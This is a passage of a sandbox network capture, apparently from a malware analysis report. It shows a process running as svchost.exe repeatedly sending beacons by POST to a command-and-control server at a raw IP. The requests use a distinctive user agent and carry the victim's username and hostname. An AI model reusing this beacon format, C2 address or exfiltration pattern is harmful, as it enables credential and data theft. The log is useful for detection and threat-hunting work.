Oct 27, 2024 08:51:12.576416016 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:51:12 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.5	50028	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:51:12.754507065 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:51:12.760457993 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:51:13.724819899 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:51:13 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.5	50029	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:51:13.925543070 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:51:13.933888912 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:51:14.886461020 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:51:14 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.5	50030	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:51:15.068078995 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:51:15.074619055 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:51:16.035806894 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:51:15 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.5	50031	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:51:17.188182116 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:51:17.193763018 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:51:18.145488977 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:51:17 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.5	50032	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:51:18.316914082 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:51:18.323355913 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:51:19.308226109 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:51:19 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.5	50033	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:51:19.484209061 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:51:19.490865946 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:51:20.460114956 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:51:20 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.5	50034	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:51:20.656801939 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:51:20.662609100 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:51:21.617213964 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:51:21 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.5	50035	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:51:21.785001993 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:51:21.790344954 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:51:22.748591900 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:51:22 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.5	50036	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:51:22.920500040 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:51:22.926085949 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:51:23.872428894 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:51:23 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.5	50037	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:51:24.050607920 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:51:24.055965900 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:51:25.027007103 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:51:24 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.5	50038	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:51:25.201051950 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:51:25.206620932 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:51:26.181401968 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:51:26 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.5	50039	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:51:26.366755962 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:51:26.372206926 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:51:27.344672918 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:51:27 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.5	50040	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:51:27.517415047 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:51:27.522768974 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:51:28.478924990 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:51:28 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.5	50041	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:51:28.643723965 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:51:28.649111032 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:51:29.601691008 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:51:29 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.5	50042	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:51:29.895097971 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:51:29.900538921 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:51:30.870965004 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:51:30 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.5	50043	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:51:31.037322044 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:51:31.042665958 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:51:32.013380051 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:51:31 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.5	50044	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:51:32.195384026 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:51:32.200989008 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:51:33.157530069 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:51:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.5	50045	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:51:33.347651005 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:51:33.352982044 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:51:34.329241991 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:51:34 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.5	50046	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:51:34.494925022 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:51:34.500866890 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:51:35.461898088 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:51:35 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.5	50047	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:51:35.640309095 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:51:35.646903038 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:51:36.719039917 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:51:36 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.5	50048	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:51:36.990935087 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
